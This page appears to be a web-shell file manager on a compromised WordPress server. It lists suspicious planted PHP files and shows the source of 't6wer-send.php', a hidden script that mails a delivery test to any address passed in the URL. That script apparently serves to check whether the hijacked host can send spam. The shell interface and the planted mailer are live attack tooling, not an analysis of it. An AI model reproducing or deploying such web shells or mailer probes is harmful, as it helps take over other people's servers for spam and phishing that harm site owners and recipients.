at path:
ROOT
/
t6wer-send.php
run:
R
W
Run
.well-known
DIR
2026-03-20 11:35:39
R
W
Run
75ffe
DIR
2026-03-10 01:07:21
R
W
Run
wp-admin
DIR
2026-03-16 09:17:04
R
W
Run
wp-content
DIR
2026-03-16 09:17:04
R
W
Run
wp-includes
DIR
2026-03-16 09:22:53
R
W
Run
.htaccess
281 By
2026-08-25 22:24:02
R
W
Run
Delete
Rename
about.php
4.44 KB
2026-02-07 08:39:33
R
W
Run
adminfuns.php
173.77 KB
2026-03-16 08:26:03
R
W
Run
chosen.php
122.65 KB
2026-03-11 06:19:26
R
W
Run
content.php
4.44 KB
2026-01-20 08:47:47
R
W
Run
radio.php
4.44 KB
2026-01-03 08:57:55
R
W
Run
simple.php
15.05 KB
2026-03-11 06:19:24
R
W
Run
spbuujdh.php
14.76 KB
2026-03-12 18:45:44
R
W
Run
t6wer-send.php
453 By
2026-03-18 02:00:55
R
W
Run
Delete
Rename
tesTzjw.php
2.87 KB
2026-03-15 21:06:53
R
W
Run
tesTzsz.php
1.15 KB
2026-03-12 18:45:55
R
W
Run
unZIPpeRemo.php
19.51 KB
2026-03-12 18:46:03
R
W
Run
wp-conffq.php
308.59 KB
2026-03-16 08:26:03
R
W
Run
wp-headre.php
16.3 KB
2026-01-04 08:54:37
R
W
Run
error_log
up
📄
t6wer-send.php
Save
<?php error_reporting(0); echo('T6werShop'); if (!empty($_GET['email'])) { if (!empty($_GET['email']) && trim($_GET['orderid']) != '') { $rand = trim($_GET['orderid']); } else { $rand = rand(); } mail(trim($_GET['email']),$_SERVER['HTTP_HOST']." - Sending is Working Fine. [Result] ID: (".$rand.")","T6wer Shop [Sending test]."); echo '<b>Send an report to ['.$_GET['email'].'] - ID: '.$rand.'</b>'; echo '<!-- <id>'.$rand.'</id> -->'; } ?>